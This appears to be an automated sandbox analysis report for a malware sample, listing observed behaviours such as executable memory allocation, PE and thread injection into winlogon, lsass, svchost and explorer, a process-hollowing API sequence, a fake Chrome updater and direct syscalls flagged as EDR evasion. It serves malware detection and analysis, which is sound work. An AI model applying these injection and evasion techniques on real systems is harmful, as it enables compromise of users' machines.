Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\svchost.exe base: 17D7B150000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\svchost.exe base: 1BE621A0000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\svchost.exe base: 2252F480000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\ctfmon.exe base: 1F28B4B0000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\svchost.exe base: 184683D0000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\explorer.exe base: 1380000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\svchost.exe base: 1972E260000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\dasHost.exe base: 2246C5E0000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\svchost.exe base: 221D5930000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\RuntimeBroker.exe base: 1ECFC650000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\RuntimeBroker.exe base: 1D178740000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\svchost.exe base: 1A633B40000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\svchost.exe base: 2928D0A0000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\dllhost.exe base: 13DAB4C0000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\smartscreen.exe base: 1A22A640000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\svchost.exe base: 21C6CF30000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\audiodg.exe base: 1D349350000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\RuntimeBroker.exe base: 23B60DA0000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\RuntimeBroker.exe base: 2135E7B0000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\svchost.exe base: 1F22F7C0000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\ApplicationFrameHost.exe base: 1F6E8150000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\RuntimeBroker.exe base: 20C52340000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\ImmersiveControlPanel\SystemSettings.exe base: 2589DA90000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\oobe\UserOOBEBroker.exe base: 1F5602E0000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\svchost.exe base: 1F4197C0000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\svchost.exe base: 1F8F1A00000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\dllhost.exe base: 228BE340000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\conhost.exe base: 20823A10000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\RuntimeBroker.exe base: 1FDFD900000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\RuntimeBroker.exe base: 25CC2A30000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\svchost.exe base: 144B2660000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Users\user\AppData\Roaming\Google\Chrome\updater.exe base: 2152C890000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe base: 1CF49670000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\conhost.exe base: 1988E640000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\svchost.exe base: 1F724890000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\wbem\WMIADAP.exe base: 222A2280000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\wbem\WMIADAP.exe base: 222A22E0000 protect: page execute and read and write

Contains functionality to inject code into remote processes

Source: C:\Windows\System32\dialer.exe

Code function: 4_2_00007FF78AB31DB4 CreateProcessW,VirtualAllocEx,WriteProcessMemory,WriteProcessMemory,VirtualAlloc,GetThreadContext,WriteProcessMemory,SetThreadContext,ResumeThread,OpenProcess,TerminateProcess,

4_2_00007FF78AB31DB4

Creates a thread in another existing process (thread injection)

Source: C:\Windows\System32\dialer.exe	Thread created: C:\Windows\System32\winlogon.exe EIP: DC612908	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Thread created: C:\Windows\System32\lsass.exe EIP: C0AB2908	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Thread created: C:\Windows\System32\svchost.exe EIP: 612D2908	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Thread created: C:\Windows\System32\dwm.exe EIP: AE262908	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Thread created: C:\Windows\System32\svchost.exe EIP: 87992908	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Thread created: C:\Windows\System32\svchost.exe EIP: 53772908	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Thread created: C:\Windows\System32\svchost.exe EIP: 5D532908	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Thread created: C:\Windows\System32\svchost.exe EIP: 67D2908	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Thread created: C:\Windows\System32\svchost.exe EIP: 5B382908	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Thread created: C:\Windows\System32\svchost.exe EIP: EBFD2908	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Thread created: C:\Windows\System32\svchost.exe EIP: 59042908	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Thread created: C:\Users\user\AppData\Roaming\Google\Chrome\updater.exe EIP: 2C1A2908	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Thread created: C:\Windows\System32\svchost.exe EIP: A9E72908	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Thread created: C:\Windows\System32\svchost.exe EIP: 73162908	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Thread created: C:\Windows\System32\svchost.exe EIP: 4E862908	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Thread created: C:\Windows\System32\svchost.exe EIP: 473C2908	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Thread created: C:\Windows\System32\svchost.exe EIP: 6F9D2908	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Thread created: C:\Windows\System32\svchost.exe EIP: 83BC2908	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: DC672908
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: C0B12908
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: 61332908
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: AED82908
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: 87F42908
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: 537D2908
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: 5D592908
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: 6E92908
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: 5B942908
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: ECD72908
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: 590A2908
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: A9ED2908
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: 731C2908
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: 4E8C2908
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: 47B62908
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: 70092908
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: 84292908
Source: C:\Windows\System32\dialer.exe	Thread created: C:\Windows\System32\svchost.exe EIP: D3FA2908
Source: C:\Windows\System32\dialer.exe	Thread created: C:\Windows\System32\svchost.exe EIP: A4152908
Source: C:\Windows\System32\dialer.exe	Thread created: C:\Windows\System32\svchost.exe EIP: BDF32908
Source: C:\Windows\System32\dialer.exe	Thread created: C:\Windows\System32\svchost.exe EIP: C0262908
Source: C:\Windows\System32\dialer.exe	Thread created: C:\Windows\System32\svchost.exe EIP: C9F32908
Source: C:\Windows\System32\dialer.exe	Thread created: C:\Windows\System32\svchost.exe EIP: 645B2908
Source: C:\Windows\System32\dialer.exe	Thread created: C:\Windows\System32\svchost.exe EIP: 7B2A2908
Source: C:\Windows\System32\dialer.exe	Thread created: C:\Windows\System32\svchost.exe EIP: 4F62908
Source: C:\Windows\System32\dialer.exe	Thread created: C:\Windows\System32\svchost.exe EIP: 2AB42908
Source: C:\Windows\System32\dialer.exe	Thread created: C:\Windows\System32\svchost.exe EIP: 4ADB2908
Source: C:\Windows\System32\dialer.exe	Thread created: C:\Windows\System32\spoolsv.exe EIP: 1992908
Source: C:\Windows\System32\dialer.exe	Thread created: C:\Windows\System32\svchost.exe EIP: 25DA2908
Source: C:\Windows\System32\dialer.exe	Thread created: C:\Windows\System32\svchost.exe EIP: F5352908
Source: C:\Windows\System32\dialer.exe	Thread created: C:\Windows\System32\svchost.exe EIP: F0D62908
Source: C:\Windows\System32\dialer.exe	Thread created: C:\Windows\System32\svchost.exe EIP: FFB2908
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: C2572908
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: 8BCF2908
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: 66982908
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: 13EF2908
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: 8D572908
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: 69B42908
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: CC742908
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: 5DA72908
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: 199D2908
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: F3892908
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: 3B82908
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: 40E42908
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: A6532908
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: 27BC2908
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: 7B152908
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: 621A2908
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: 2F482908
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: 8B4B2908
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: 683D2908
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: 1382908
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: 2E262908
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: 6C5E2908
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: D5932908
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: FC652908
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: 78742908
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: 33B42908
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: 8D0A2908
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: AB4C2908
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: 2A642908
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: 6CF32908
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: 49352908
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: 60DA2908
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: 5E7B2908
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: 2F7C2908
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: E8152908
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: 52342908
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: 9DA92908
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: 602E2908
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: 197C2908
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: F1A02908
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: BE342908
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: 23A12908
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: FD902908
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: C2A32908
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: B2662908
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: 2C892908
Source: C:\Windows\System32\dialer.exe	Thread created: C:\Windows\System32\conhost.exe EIP: 8E642908
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: 24892908
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: A2282908
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: A22E2908

Found direct / indirect Syscall (likely to bypass EDR)

Source: C:\Users\user\AppData\Roaming\Google\Chrome\updater.exe	NtAdjustPrivilegesToken: Direct from: 0x7FF750F65BFE			Jump to behavior
Source: C:\Users\user\Desktop\ylVAEHbMLf.exe	NtQuerySystemInformation: Direct from: 0x7FF6A0405BFE			Jump to behavior

Injects a PE file into a foreign processes

Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\winlogon.exe base: 225DC610000 value starts with: 4D5A	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\lsass.exe base: 202C0AB0000 value starts with: 4D5A	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 2A6612D0000 value starts with: 4D5A	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\dwm.exe base: 2BAAE260000 value starts with: 4D5A	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 26A87990000 value starts with: 4D5A	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 17953770000 value starts with: 4D5A	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 2295D530000 value starts with: 4D5A	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 253067D0000 value starts with: 4D5A	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 1845B380000 value starts with: 4D5A	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 1ADEBFD0000 value starts with: 4D5A	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 1D559040000 value starts with: 4D5A	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 241A9E70000 value starts with: 4D5A	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Users\user\AppData\Roaming\Google\Chrome\updater.exe base: 2152C1A0000 value starts with: 4D5A	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 1CD73160000 value starts with: 4D5A	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 2824E860000 value starts with: 4D5A	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 21B473C0000 value starts with: 4D5A	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 2086F9D0000 value starts with: 4D5A	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 17183BC0000 value starts with: 4D5A	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 23FD3F70000 value starts with: 4D5A	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\winlogon.exe base: 225DC670000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\lsass.exe base: 202C0B10000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 2A661330000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\dwm.exe base: 2BAAED80000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 26A87F40000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 179537D0000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 2295D590000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 25306E90000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 1845B940000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 1ADECD70000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 1D5590A0000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 241A9ED0000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 1CD731C0000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 2824E8C0000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 21B47B60000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 20870090000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 17184290000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 23FD3FA0000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 1D2A4150000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 275BDF30000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 1AAC0260000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 203C9F30000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 1B5645B0000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 1BB7B2A0000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 1C004F60000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 24E2AB40000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 2644ADB0000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\spoolsv.exe base: 1990000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 20D25DA0000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 26EF5350000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 2A7F0D60000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 23D0FFB0000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 1B1C2570000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 2108BCF0000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 29166980000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exe base: 21C13EF0000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 1988D570000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 13869B40000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 1E1CC740000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 2855DA70000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 2BF199D0000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 15AF3890000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 21A03B80000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\sihost.exe base: 1CD40E40000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 151A6530000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 19E27BC0000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 17D7B150000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 1BE621A0000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 2252F480000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\ctfmon.exe base: 1F28B4B0000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 184683D0000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\explorer.exe base: 1380000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 1972E260000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\dasHost.exe base: 2246C5E0000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 221D5930000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\RuntimeBroker.exe base: 1ECFC650000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\RuntimeBroker.exe base: 1D178740000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 1A633B40000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 2928D0A0000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\dllhost.exe base: 13DAB4C0000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\smartscreen.exe base: 1A22A640000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 21C6CF30000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\audiodg.exe base: 1D349350000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\RuntimeBroker.exe base: 23B60DA0000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\RuntimeBroker.exe base: 2135E7B0000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 1F22F7C0000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\ApplicationFrameHost.exe base: 1F6E8150000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\RuntimeBroker.exe base: 20C52340000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\ImmersiveControlPanel\SystemSettings.exe base: 2589DA90000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\oobe\UserOOBEBroker.exe base: 1F5602E0000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 1F4197C0000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 1F8F1A00000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\dllhost.exe base: 228BE340000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\conhost.exe base: 20823A10000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\RuntimeBroker.exe base: 1FDFD900000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\RuntimeBroker.exe base: 25CC2A30000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 144B2660000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Users\user\AppData\Roaming\Google\Chrome\updater.exe base: 2152C890000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe base: 1CF49670000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\conhost.exe base: 1988E640000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 1F724890000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\wbem\WMIADAP.exe base: 222A2280000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\wbem\WMIADAP.exe base: 222A22E0000 value starts with: 4D5A

Injects code into the Windows Explorer (explorer.exe)

Source: C:\Windows\System32\dialer.exe

Memory written: PID: 2580 base: 1380000 value: 4D

Maps a DLL or memory area into another process

Source: C:\Users\user\Desktop\ylVAEHbMLf.exe	Section loaded: NULL target: C:\Windows\System32\dialer.exe protection: readonly	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Google\Chrome\updater.exe	Section loaded: NULL target: C:\Windows\System32\dialer.exe protection: readonly	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Google\Chrome\updater.exe	Section loaded: NULL target: unknown protection: readonly	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Google\Chrome\updater.exe	Section loaded: NULL target: unknown protection: readonly	Jump to behavior

Modifies the context of a thread in another process (thread injection)

Source: C:\Users\user\Desktop\ylVAEHbMLf.exe	Thread register set: target process: 5796	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Google\Chrome\updater.exe	Thread register set: target process: 6252	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Google\Chrome\updater.exe	Thread register set: target process: 6208	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Google\Chrome\updater.exe	Thread register set: target process: 1668	Jump to behavior

Writes to foreign memory regions

Source: C:\Users\user\Desktop\ylVAEHbMLf.exe	Memory written: C:\Windows\System32\dialer.exe base: 25C231F010	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\winlogon.exe base: 225DC610000	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\lsass.exe base: 202C0AB0000	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 2A6612D0000	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\dwm.exe base: 2BAAE260000	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 26A87990000	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 17953770000	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 2295D530000	Jump to behavior
